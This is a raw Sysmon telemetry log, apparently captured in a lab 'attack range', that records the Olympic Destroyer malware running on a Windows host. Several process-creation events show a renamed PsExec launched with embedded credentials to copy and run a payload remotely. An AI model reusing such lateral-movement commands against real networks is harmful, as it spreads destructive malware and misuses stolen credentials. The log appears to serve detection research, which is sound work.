10:57:05.583{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292283Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:05.583{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292282Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:05.583{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292281Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:05.583{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292280Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:05.583{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292279Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:05.583{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292278Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:05.568{C8EA50B7-F2AA-6215-B100-000000003802}22443360C:\Windows\system32\csrss.exe{C8EA50B7-1301-6216-FB05-000000003802}596C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000292277Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:05.568{C8EA50B7-12E6-6216-4B05-000000003802}67926924C:\Temp\olympic_destroyer.exe{C8EA50B7-1301-6216-FB05-000000003802}596C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4985|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000292276Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:05.569{C8EA50B7-1301-6216-FB05-000000003802}596C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\239.255.255.250 -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000292275Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:05.568{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-1301-6216-FB05-000000003802}596C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292274Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:05.552{C8EA50B7-F2AA-6215-B100-000000003802}22444896C:\Windows\system32\csrss.exe{C8EA50B7-1301-6216-FA05-000000003802}5804C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000292273Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:05.552{C8EA50B7-12E6-6216-4B05-000000003802}67926964C:\Temp\olympic_destroyer.exe{C8EA50B7-1301-6216-FA05-000000003802}5804C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4a2f|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000292272Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:05.557{C8EA50B7-1301-6216-FA05-000000003802}5804C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\224.0.0.22 -u "TEQUILABOOMBOOM\janettedoe" -p "jane" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000292271Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:05.552{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-1301-6216-FA05-000000003802}5804C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 534500x8000000000000000292270Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:05.552{C8EA50B7-1301-6216-F805-000000003802}6404C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 10341000x8000000000000000292269Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:05.536{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-1301-6216-F805-000000003802}6404C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292268Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:05.536{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-1301-6216-F805-000000003802}6404C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000292267Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 10:57:05.521{C8EA50B7-1301-6216-F805-000000003802}6404C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 10341000x8000000000000000292266Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:05.498{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-1301-6216-F905-000000003802}6112C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292265Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:05.498{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-1301-6216-F905-000000003802}6112C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292264Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:05.483{C8EA50B7-1301-6216-F905-000000003802}61126444C:\Windows\system32\conhost.exe{C8EA50B7-1301-6216-F805-000000003802}6404C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292263Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:05.467{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292262Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:05.467{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292261Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:05.467{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292260Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:05.467{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292259Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:05.452{C8EA50B7-F2AA-6215-B100-000000003802}22444896C:\Windows\system32\csrss.exe{C8EA50B7-1301-6216-F905-000000003802}6112C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000292258Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:05.452{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-1301-6216-F905-000000003802}6112C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000292257Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:05.335{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=55A2F56BEC35410BE9A942525C453AF3,SHA256=35554D744E43B7129623A29C84DB4DDCE67F8F1CD3753468040797CF790B2D85,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000292256Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:05.320{C8EA50B7-F2AA-6215-B100-000000003802}22442592C:\Windows\system32\csrss.exe{C8EA50B7-1301-6216-F805-000000003802}6404C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000292255Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:05.319{C8EA50B7-12E6-6216-4B05-000000003802}67926964C:\Temp\olympic_destroyer.exe{C8EA50B7-1301-6216-F805-000000003802}6404C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4985|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000292254Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:05.318{C8EA50B7-1301-6216-F805-000000003802}6404C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\igmp.mcast.net -u "TEQUILABOOMBOOM\janettedoe" -p "jane" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 